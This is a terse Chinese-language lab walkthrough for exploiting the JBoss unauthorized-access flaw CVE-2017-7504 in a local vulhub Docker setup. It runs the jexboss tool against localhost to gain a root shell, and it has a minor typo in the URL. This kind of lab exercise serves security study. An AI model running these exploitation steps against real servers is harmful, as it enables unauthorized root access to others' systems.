JBOSS未授权访问漏洞利用
-
vulhub下载
-
docker下部署过程
-
复制到linux环境
-
进入环境: /home/kali/vulhub/jboss/CVE-2017-7504
-
docker-compose up -d启动
-
访问127.0.0.1::8080 ,点击JMX Console
-
-
利用过程:
-
下载工具
-
cd jexboss
-
执行命令
python3 jexboss.py -u 127.0.0.1:8080
返回vulnerable说明漏洞存在
-
输入yes确认攻击
-
利用成功,直接就是root权限
-
-